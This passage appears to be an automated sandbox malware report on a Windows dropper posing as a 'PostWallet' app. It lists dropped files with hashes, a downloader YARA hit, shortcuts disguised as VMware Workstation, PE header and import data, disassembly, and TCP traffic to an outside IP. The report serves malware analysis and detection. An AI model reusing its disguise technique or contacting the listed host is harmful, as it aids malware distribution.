                                        Preview:.[07/03/24 10:35:59] info: Program: Starting Squirrel Updater: --install . --rerunningWithoutUAC..[07/03/24 10:35:59] info: Program: Starting install, writing to C:\Users\user\AppData\Local\SquirrelTemp..[07/03/24 10:35:59] info: Program: About to install to: C:\Users\user\AppData\Local\PostWallet..[07/03/24 10:35:59] info: CheckForUpdateImpl: Reading RELEASES file from C:\Users\user\AppData\Local\SquirrelTemp..[07/03/24 10:35:59] info: CheckForUpdateImpl: First run, starting from scratch..[07/03/24 10:35:59] info: ApplyReleasesImpl: Writing files to app directory: C:\Users\user\AppData\Local\PostWallet\app-1.0.0..[07/03/24 10:36:00] info: ApplyReleasesImpl: Squirrel Enabled Apps: []..[07/03/24 10:36:00] warn: ApplyReleasesImpl: No apps are marked as Squirrel-aware! Going to run them all..[07/03/24 10:36:00] info: ApplyReleasesImpl: About to create shortcuts for FilePost.a.exe, rootAppDir C:\Users\user\AppData\Local\PostWallet..[07/03/24 10:36:00] info: ApplyReleasesImpl: Crea

                                        C:\Users\user\AppData\Local\SquirrelTemp\Update.exe

                                        Download File
                                        Process:C:\Users\user\Desktop\00023948209303294#U00ac320302282349843984903.exe
                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                        Category:dropped
                                        Size (bytes):1899520
                                        Entropy (8bit):5.894883178349122
                                        Encrypted:false
                                        SSDEEP:24576:pWltPuAnUCiag6CKM2zCy9sQuOjj1VgZej6GeS4lNrCze5qhYp4t9m2:0t3UCiag6CKM2zCyZuOjJaxSS5qh
                                        MD5:A560BAD9E373EA5223792D60BEDE2B13
                                        SHA1:82A0DA9B52741D8994F28AD9ED6CBD3E6D3538FA
                                        SHA-256:76359CD4B0349A83337B941332AD042C90351C2BB0A4628307740324C97984CC
                                        SHA-512:58A1B4E1580273E1E5021DD2309B1841767D2A4BE76AB4A7D4FF11B53FA9DE068F6DA67BF0DCCFB19B4C91351387C0E6E200A2A864EC3FA737A1CB0970C8242C
                                        Malicious:true
                                        Yara Hits:
                                        • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe, Author: Joe Security
                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...5.p_............................>.... ........@.. .......................`............@.....................................W.... .......................@....................................................... ............... ..H............text...D.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................ .......H.......LU..............,.................................................{....*..{....*..{....*r.(......}......}......}....*....0..S........u......,G(.....{.....{....o....,/(.....{.....{....o....,.(.....{.....{....o....*.*..0..K....... .A. )UU.Z(.....{....o....X )UU.Z(.....{....o....X )UU.Z(.....{....o....X*..0...........r...p......%..{.......%q.........-.&.+.......o.....%..{.......%q.........-.&.+.......o.....%..{.......%q.........-.&.+.......o.....(....*....{....*..{....*

                                        C:\Users\user\AppData\Local\Temp\.squirrel-lock-DFC38E711ED80E7DCCA65DBC52A2C91F7124F492

                                        Download File
                                        Process:C:\Users\user\AppData\Local\SquirrelTemp\Update.exe
                                        File Type:ISO-8859 text, with CR line terminators
                                        Category:dropped
                                        Size (bytes):4
                                        Entropy (8bit):2.0
                                        Encrypted:false
                                        SSDEEP:3:9:9
                                        MD5:A7E0F8AC46398A7876D1E40DD52C2AAB
                                        SHA1:B66922B4E6F09E23C072E4AFF49C67C3121DD5AF
                                        SHA-256:05174BBF0D407087E45B12BAAE17117426852FF3A9E58D12A0EBB9A10B409743
                                        SHA-512:E6B93215582F7F4F5E9292273A9466B5D0CC3A4EA7D77AE42854203755441DD5EDBEFB11FE8890CAE7783E41E2EDBF61EC7B03D7E5E9870A7821D4016B095F79
                                        Malicious:false
                                        Preview:....

                                        C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VMware, Inc\VMware Workstation.lnk

                                        Download File
                                        Process:C:\Users\user\AppData\Local\SquirrelTemp\Update.exe
                                        File Type:MS Windows shortcut, Item id list present, Has Description string, Has Relative path, Has Working directory, Icon number=0, ctime=Sun Dec 31 23:06:32 1600, mtime=Sun Dec 31 23:06:32 1600, atime=Sun Dec 31 23:06:32 1600, length=0, window=hide
                                        Category:dropped
                                        Size (bytes):2136
                                        Entropy (8bit):2.679977093044876
                                        Encrypted:false
                                        SSDEEP:24:8nLDaRHQJl+zqH9L9q2O4Zfqqd9HAKqyh7ECtU:8LmRHwl+zqH9L9q2ZfqqXAHyh7EWU
                                        MD5:90BE0660EE36A0209BC50D9DD9598E1F
                                        SHA1:5A9C96532946AADBDD6CB3C47F7965BB9300C516
                                        SHA-256:BB6C1BAA9ED2BE4ACDEEDDC954112E5231E1C2F7C0B6EB1D3AD68913F1623880
                                        SHA-512:A9151A94C447780504176FCB539C4F1104C3DFE460CC6EC0F0B734919346B07B1D7DF5D51D46732168CF65ADDCEE7E432D3A267B6F7B9681EBC91CC750A2C4FB
                                        Malicious:false
                                        Preview:L..................F.@......................................................O....P.O. .:i.....+00.../C:\...................P.1...........Users.<............................................U.s.e.r.s.....P.1...........user.<............................................j.o.n.e.s.....V.1...........AppData.@............................................A.p.p.D.a.t.a.....P.1...........Local.<............................................L.o.c.a.l.....`.1...........PostWallet..F............................................P.o.s.t.W.a.l.l.e.t.....z.6...........F.i.l.e.P.o.s.t...a...e.x.e...N............................................F.i.l.e.P.o.s.t...a...e.x.e...,.....P.o.s.t.W.a.l.l.e.t.1.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.P.o.s.t.W.a.l.l.e.t.\.F.i.l.e.P.o.s.t...a...e.x.e.1.C.:.\.U.s.e.r.s.\.j.o.n.e.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.P.o.s.t.W.a.l.l.e.t.\.a.p.p.-.1...0...0.6.C.:.\.U.s.e.r.s.\.j.o.n.e.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.P.o.s.t.W.a.l.l.e.t.\.F.i.l.e.P.o.s.t...a...e.x.e

                                        C:\Users\user\Desktop\VMware Workstation.lnk

                                        Download File
                                        Process:C:\Users\user\AppData\Local\SquirrelTemp\Update.exe
                                        File Type:MS Windows shortcut, Item id list present, Has Description string, Has Relative path, Has Working directory, Icon number=0, ctime=Sun Dec 31 23:06:32 1600, mtime=Sun Dec 31 23:06:32 1600, atime=Sun Dec 31 23:06:32 1600, length=0, window=hide
                                        Category:dropped
                                        Size (bytes):2122
                                        Entropy (8bit):2.6791602023832
                                        Encrypted:false
                                        SSDEEP:24:8nLDaRHQJl+pqH9L9q2O4Zfqqd9HAKqyh7ECtU:8LmRHwl+pqH9L9q2ZfqqXAHyh7EWU
                                        MD5:D6166FF8DE9CFE5A9197C15881EC833E
                                        SHA1:63A40A00A9A9465814913C4A74AD7AAE013EE9B0
                                        SHA-256:914628EFA73C14808689F00957724B50355393DE558206F24BB71C30924CF220
                                        SHA-512:E08AA3F9BA61B8729EF94B6515D0D3EE940C85A23C6D34B92E0A003BA880D6D23B1B191C9435115D9322D7B960C7207D3509630CE4DA0A1550D68A758F0FAE20
                                        Malicious:false
                                        Preview:L..................F.@......................................................O....P.O. .:i.....+00.../C:\...................P.1...........Users.<............................................U.s.e.r.s.....P.1...........user.<............................................j.o.n.e.s.....V.1...........AppData.@............................................A.p.p.D.a.t.a.....P.1...........Local.<............................................L.o.c.a.l.....`.1...........PostWallet..F............................................P.o.s.t.W.a.l.l.e.t.....z.6...........F.i.l.e.P.o.s.t...a...e.x.e...N............................................F.i.l.e.P.o.s.t...a...e.x.e...,.....P.o.s.t.W.a.l.l.e.t.*.....\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.P.o.s.t.W.a.l.l.e.t.\.F.i.l.e.P.o.s.t...a...e.x.e.1.C.:.\.U.s.e.r.s.\.j.o.n.e.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.P.o.s.t.W.a.l.l.e.t.\.a.p.p.-.1...0...0.6.C.:.\.U.s.e.r.s.\.j.o.n.e.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.P.o.s.t.W.a.l.l.e.t.\.F.i.l.e.P.o.s.t...a...e.x.e.........%USER

                                        Static File Info

                                        General

                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                        Entropy (8bit):7.9945445565179565
                                        TrID:
                                        • Win32 Executable (generic) a (10002005/4) 99.96%
                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                        • DOS Executable Generic (2002/1) 0.02%
                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                        File name:00023948209303294#U00ac320302282349843984903.exe
                                        File size:6'569'472 bytes
                                        MD5:9e1e30202d950ce1f273eb2e8492f39b
                                        SHA1:4d76edbdb6976aa2acbbe9c4264a6fc9176584ff
                                        SHA256:ddef5168dd82c49304884fd4fb0720a865588dad07f1350ee2eba97cf15ee4c7
                                        SHA512:25402db8233ae501a2c6a6646cb26414b90c6e996fb9b19702e08700a56c40550c01cae92332547ed58f821dd3a447613cc716f77542476bda13f9c9dab510d6
                                        SSDEEP:196608:TrH3BZaqdwA8xEAQmoPOt20dr31XS658JTBPWb8QfiIq28O:Tr/DdAmAR3fdtS658JTBD/Z
                                        TLSH:BF663321B794D035E0371A3369E875214C7F7EA1972064AB77C42B7E86300D68B7ABBD
                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........X........................y.......................................................a...T.......T.Z.......2.....T.......Rich...

                                        File Icon

                                        Icon Hash:13170f6d2d6d6d33

                                        Static PE Info

                                        General

                                        Entrypoint:0x40ab5c
                                        Entrypoint Section:.text
                                        Digitally signed:false
                                        Imagebase:0x400000
                                        Subsystem:windows gui
                                        Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                        DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                        Time Stamp:0x5F70D7D7 [Sun Sep 27 18:20:07 2020 UTC]
                                        TLS Callbacks:
                                        CLR (.Net) Version:
                                        OS Version Major:6
                                        OS Version Minor:0
                                        File Version Major:6
                                        File Version Minor:0
                                        Subsystem Version Major:6
                                        Subsystem Version Minor:0
                                        Import Hash:e6f4169f2a5c3a8f93171d9f593bd22a

                                        Entrypoint Preview

                                        Instruction
                                        call 00007F026C71B6ACh
                                        jmp 00007F026C71AFCFh
                                        ret
                                        push ebp
                                        mov ebp, esp
                                        push esi
                                        push dword ptr [ebp+08h]
                                        mov esi, ecx
                                        call 00007F026C71B1ADh
                                        mov dword ptr [esi], 0041F45Ch
                                        mov eax, esi
                                        pop esi
                                        pop ebp
                                        retn 0004h
                                        and dword ptr [ecx+04h], 00000000h
                                        mov eax, ecx
                                        and dword ptr [ecx+08h], 00000000h
                                        mov dword ptr [ecx+04h], 0041F464h
                                        mov dword ptr [ecx], 0041F45Ch
                                        ret
                                        push ebp
                                        mov ebp, esp
                                        push esi
                                        push dword ptr [ebp+08h]
                                        mov esi, ecx
                                        call 00007F026C71B17Ah
                                        mov dword ptr [esi], 0041F478h
                                        mov eax, esi
                                        pop esi
                                        pop ebp
                                        retn 0004h
                                        and dword ptr [ecx+04h], 00000000h
                                        mov eax, ecx
                                        and dword ptr [ecx+08h], 00000000h
                                        mov dword ptr [ecx+04h], 0041F480h
                                        mov dword ptr [ecx], 0041F478h
                                        ret
                                        push ebp
                                        mov ebp, esp
                                        push esi
                                        mov esi, ecx
                                        lea eax, dword ptr [esi+04h]
                                        mov dword ptr [esi], 0041F43Ch
                                        and dword ptr [eax], 00000000h
                                        and dword ptr [eax+04h], 00000000h
                                        push eax
                                        mov eax, dword ptr [ebp+08h]
                                        add eax, 04h
                                        push eax
                                        call 00007F026C71C8BCh
                                        pop ecx
                                        pop ecx
                                        mov eax, esi
                                        pop esi
                                        pop ebp
                                        retn 0004h
                                        lea eax, dword ptr [ecx+04h]
                                        mov dword ptr [ecx], 0041F43Ch
                                        push eax
                                        call 00007F026C71C907h
                                        pop ecx
                                        ret
                                        push ebp
                                        mov ebp, esp
                                        push esi
                                        mov esi, ecx
                                        lea eax, dword ptr [esi+04h]
                                        mov dword ptr [esi], 0041F43Ch
                                        push eax
                                        call 00007F026C71C8F0h
                                        test byte ptr [ebp+08h], 00000001h

                                        Data Directories

                                        NameVirtual AddressVirtual Size Is in Section
                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x2932c0x50.rdata
                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x2c0000x618fd0.rsrc
                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x6450000x190c.reloc
                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x277200x70.rdata
                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x1f3980x40.rdata
                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_IAT0x1f0000x1a4.rdata
                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x28ef00xe0.rdata
                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                        Sections

                                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                        .text0x10000x1d32b0x1d400723597f58d5674921108e642a8e1b5b4False0.5962540064102564data6.658318567238198IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                        .rdata0x1f0000xacae0xae00fa1645fd03dda975b8bd67904b34af32False0.44526760057471265data4.948544868021258IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                        .data0x2a0000x18700xe00f8724007e5d2ce85c65b5408a736d005False0.21484375data3.016754020922221IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                        .rsrc0x2c0000x618fd00x619000ec7f9a989e7f06bc72b68f43d45b374eunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                        .reloc0x6450000x190c0x1a00fca0dc86189b5b127d85095ebd6abd95False0.7630709134615384data6.514362877721557IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                        Resources

                                        NameRVASizeTypeLanguageCountryZLIB Complexity
                                        DATA0x2c3400x616301Zip archive data, at least v2.0 to extract, compression method=deflateEnglishUnited States1.0003108978271484
                                        FLAGS0x6426440xcdataEnglishUnited States1.6666666666666667
                                        RT_ICON0x6426500x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 512EnglishUnited States0.21774193548387097
                                        RT_ICON0x6429380x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsEnglishUnited States0.11597472924187725
                                        RT_ICON0x6431e00x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 512EnglishUnited States0.21774193548387097
                                        RT_ICON0x6434c80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsEnglishUnited States0.11597472924187725
                                        RT_STRING0x643d700x418dataEnglishUnited States0.3148854961832061
                                        RT_STRING0x6441880x604dataEnglishUnited States0.21363636363636362
                                        RT_STRING0x64478c0x152dataEnglishUnited States0.5591715976331361
                                        RT_GROUP_ICON0x6448e00x22dataEnglishUnited States1.0588235294117647
                                        RT_GROUP_ICON0x6449040x22dataEnglishUnited States1.088235294117647
                                        RT_VERSION0x6449280x2c0dataEnglishUnited States0.4659090909090909
                                        RT_MANIFEST0x644be80x3e7XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (939), with CRLF line terminatorsEnglishUnited States0.5145145145145145

                                        Imports

                                        DLLImport
                                        KERNEL32.dllLoadResource, FindResourceW, lstrlenW, GetProcAddress, GetModuleHandleW, DeleteCriticalSection, GetTempPathW, GetLastError, GetTempFileNameW, MoveFileW, WaitForSingleObject, GetExitCodeProcess, CloseHandle, DeleteFileW, GetModuleFileNameW, GetCurrentProcess, LoadLibraryW, FreeLibrary, InitializeCriticalSectionEx, GetFileAttributesW, CreateFileW, SetFilePointer, ReadFile, VerSetConditionMask, GetCurrentDirectoryW, MultiByteToWideChar, LocalFileTimeToFileTime, WideCharToMultiByte, CreateDirectoryW, WriteFile, SetFileTime, FreeResource, SizeofResource, LockResource, CreateProcessW, GetSystemDirectoryW, SetDefaultDllDirectories, GetCurrentThreadId, DecodePointer, RaiseException, LeaveCriticalSection, EnterCriticalSection, lstrcmpiW, LoadLibraryExW, GetConsoleMode, GetConsoleCP, SystemTimeToFileTime, VerifyVersionInfoW, GetSystemInfo, VirtualProtect, VirtualQuery, LoadLibraryExA, IsDebuggerPresent, OutputDebugStringW, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TerminateProcess, IsProcessorFeaturePresent, GetStartupInfoW, QueryPerformanceCounter, GetCurrentProcessId, GetSystemTimeAsFileTime, InitializeSListHead, RtlUnwind, SetLastError, EncodePointer, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, ExitProcess, GetModuleHandleExW, GetStdHandle, HeapFree, HeapAlloc, GetFileType, CompareStringW, LCMapStringW, HeapSize, HeapReAlloc, FindClose, FindFirstFileExW, FindNextFileW, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetEnvironmentVariableW, GetProcessHeap, SetStdHandle, GetStringTypeW, GetFileSizeEx, SetFilePointerEx, FlushFileBuffers, WriteConsoleW
                                        SHLWAPI.dllPathIsUNCW
                                        COMCTL32.dllInitCommonControlsEx

                                        Possible Origin

                                        Language of compilation systemCountry where language is spokenMap
                                        EnglishUnited States

                                        Network Behavior

                                        Network Port Distribution

                                        TCP Packets

                                        TimestampSource PortDest PortSource IPDest IP
                                        Mar 7, 2024 10:36:06.926824093 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:06.926861048 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:06.926992893 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:06.939126015 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:06.939141035 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:07.941988945 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:07.942569017 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:08.051379919 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:08.051465988 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:08.051944971 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:08.052011967 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:08.055799961 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:08.096266985 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:08.414163113 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:08.414242983 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:08.741759062 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:08.741806030 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:08.741853952 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:08.741859913 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:08.741909981 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:08.741949081 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:08.741949081 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:08.741964102 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:08.741993904 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:08.742017031 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:08.742027044 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:08.742120028 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:08.742135048 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:08.742161036 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:08.742197037 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:08.742204905 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:08.742214918 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:08.742235899 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:08.742269039 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:08.742290020 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:09.069405079 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:09.069438934 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:09.069487095 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:09.069524050 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:09.069593906 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:09.069631100 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:09.069654942 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:09.069668055 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:09.069773912 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:09.070385933 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:09.070456028 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:09.070482016 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:09.070494890 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:09.070522070 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:09.070542097 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:09.070563078 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:09.070614100 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:09.071201086 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:09.071271896 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:09.071290970 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:09.071305037 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:09.071332932 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:09.071352959 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:09.071393967 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:09.071451902 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:09.397150040 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:09.397186041 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:09.397242069 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:09.397315025 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:09.397315025 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:09.397383928 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:09.397445917 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:09.397959948 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:09.398025036 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:09.398102045 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:09.398106098 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:09.398134947 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:09.398159027 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:09.398183107 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:09.398778915 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:09.398823977 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:09.398864031 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:09.398883104 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:09.398910046 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:09.399143934 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:09.399156094 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:09.399209023 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:09.399709940 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:09.399761915 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:09.399789095 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:09.399807930 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:09.399831057 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:09.399852991 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:09.399862051 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:09.400260925 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:09.400424957 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:09.400489092 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:09.400501966 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:09.400513887 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:09.400552988 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:09.400573015 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:09.400583029 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:09.400688887 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:09.401936054 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:09.401993990 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:09.402025938 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:09.402038097 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:09.402069092 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:09.402086020 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:09.402096987 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:09.402430058 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:09.724769115 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:09.724834919 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:09.724910975 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:09.724977016 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:09.725022078 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:09.725043058 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:09.727699995 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:09.727741957 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:09.727773905 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:09.727787971 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:09.727814913 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:09.727834940 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:09.727876902 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:09.727996111 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:09.728015900 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:09.728032112 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:09.728044033 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:09.728068113 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:09.728091955 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:09.728102922 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:09.728149891 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:09.728295088 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:09.728337049 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:09.728369951 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:09.728384972 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:09.728442907 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:09.728462934 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:09.728471994 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:09.728600025 CET4434972916.12.1.14192.168.2.4
